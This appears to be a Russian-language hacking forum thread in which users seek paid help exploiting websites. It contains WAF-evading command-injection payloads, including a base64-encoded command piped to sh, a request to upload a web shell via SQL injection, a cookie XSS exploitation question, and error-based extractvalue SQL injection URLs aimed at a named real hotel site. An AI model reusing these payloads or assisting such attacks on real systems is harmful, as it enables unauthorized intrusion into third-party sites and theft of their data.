Может кто подскажет по данному вопросу? PS: В какой ветке можно разместить пост, из разряда помощь со скулей, скину на пиво( А то подобных тем не видел в услугах(
Фрагментированные SQL иньекции HTTP Parameter Pollution https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/PT-devteev-CC-WAF.pdf https://www.ptsecurity.com/upload/c...s/Ю.Гольцев_Уязвимости_web_сложные_случаи.pdf
It seems that there are some unknown logic on backend, not traditional WAF. Try to fuzz and detect the white/black sequences and conduct the attack vector in accordance with the circumstances. For example: Code: ;id; `id` ;sleep 100; `sleep 100` uname${IFS}-a echo$IFS"bHMgLWxh"|base64$IFS-d|sh `echo$IFS"bHMgLWxh"|base64$IFS-d|sh>log.txt` and so on... Also check this.
Подскажите как загрузить шелл через SQLi union based иньекция FILE_PRIV = Y (5.5.60-log) Включен --secure-file-priv соответственно into outfile не рабоатет.
Yes i can upload file data to table, but im looking for way write data to file. magic_quotes_gpc = off
Есть уязвимость, Cross site scripting в куках GET site/eta.php HTTP/1.1 Referer: https://www.google.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/45.0.2228.0 Safari/537.21 Cookie: cache=Cross site scripting Есть пример эксплуатации такой уязвимости ?
Может ли кто попробовать раскрутить уязвимость руками, в sqlmap никак не идет, но думаю надо руками. Сайт скину в личку. На пиво скину)
вытаскивать по одному символу через функцию mid() или substring(), а если конкретней пример, то я бы переделал конструкцию запроса
Я бы убрал бы груп контакт, действитель, еррор вектор не выводит в один запрос длинные пароли, надо использовать функцию substring(1,10) дальше substring(11,21) итд
https://alushta-hotel.com.ua/room.php?id=1' and extractvalue(0x0a,concat(0x0a,(select substring(version(),1,2))))+--+- https://alushta-hotel.com.ua/room.php?id=1' and extractvalue(0x0a,concat(0x0a,(select substring(version(),3,5))))+--+-